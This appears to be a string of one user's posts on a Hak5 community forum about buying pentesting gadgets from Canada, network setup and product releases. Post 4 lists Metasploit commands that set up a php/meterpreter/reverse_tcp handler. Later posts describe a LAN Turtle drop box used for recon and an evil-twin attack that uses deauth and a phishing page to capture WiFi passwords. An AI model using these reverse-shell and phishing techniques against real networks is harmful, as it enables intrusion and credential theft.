  1. Oh no hidden fees. From hak5.

My hak5 shopping experience has been amazing.   Other than the cost from my country

The hidden fees are border fees and taxes.   Plus a extra bit for delivery

What costs the most was the USA exchange rate.  Which is better now.

Like I said I will stick to buying on sale days.   Tho I think hak5 should put a few extra stickers in for Canadians

My turtle, nano, and mkv.  Need a new friend. That quacks

  2. Sweet  I may have to get a ducky

My experince in buying my nano opened my eyes    I will be buying when on sale only

I love my hak5 tools    but  its sucks buying from Canada

150$ came to 280 after all tax and shipping   plus hidden fees

So I am hoping  a rubber ducky will cost less than 130  for a 50$ device on black Friday

  3. Had to setup the network connection manually (on Ubuntu 16.10) with: IP - 172.16.84.1, Netmask - 255.255.255.0, Gateway - 192.168.1.1, DNS Servers - 208.67.222.222 and 208.67.220.220.

make sure your ubuntu machine is not on 172.16.84.1   set it to 172.16.84.42

  4. I had the same issue and found this

It appears that you used the windows payload with your handler. Be sure to set your payload to php/meterpreter/reverse_tcp to get the correct payload and protocol setup.

    msf > use exploit/multi/handler

    msf exploit(handler) > set lhost 192.168.56.1

    lhost => 192.168.56.1

    msf exploit(handler) > set payload php/meterpreter/reverse_tcp

    payload => php/meterpreter/reverse_tcp

  6. Ya I think for noobs you may want to hold off buying the dev nano

This release isn't what your looking for this release is more for the development community to start making modules and testing for the official release that way there are less questions about what can I do with it

But if you got a Development model Try looking at the modules and try making your hello world module who knows may you will make the nano better by contributing to the modules

As this is what this forum is all about

A community coming together to make the amazing hak5 products even better

    Thru community input

  7. I have been here a while as a member I got a mkv before defcon last year

We all had to wait it's not Walmart it's a small hack shop things take time

We can't expect good stuff rushed out the door It needs to be tested retested a site remade all of the stuff that comes with a release don't blame the awesome team who have been working to bring new gear give them time

I am excited unfortionally this close to Xmas I will have to wait till Feb till I can afford a new pineapple

But instead of bitching why not show more support as a great community does

Great job Hak5 guys and gals can't wait to see what you did this time

Ps coupon code discount for long term members would be cool

  8. It might be so new members can't spam

I mean if you have only had a account for a few days you should reading more than posting there's a lot to read or seach with out the need to post don't worry I think it's just to tame trolls

  9. I have some extra toys laying around

So I connected my turtle to my dlink dir506 once it's plugged in it powers the turtle from USB and connects it to the Lan thru the WiFi extender wich I can connect to any WiFi with access a great nearby recon tool

I figured I would show how awesome the turtle is when used with other products

I have a wireless lanturtle drop box

Figured to share to show other options

  10. Karma would attract your device assume

I don't use evil twin but I am sure it de auth everyone from network 1 and and puts a network with the same name and uses karma to attract to open network

If your device is set to connect to open wireless yes it would just switch and offer you a pbishing page asking for password to update

  11. Your right our devices are smart enough to not just connect but the phish

Is the trick it clones the encrypted WiFi and replaces it with a open and as soon as you connect it offers you a update just give me your password

    It's a social engineering attack
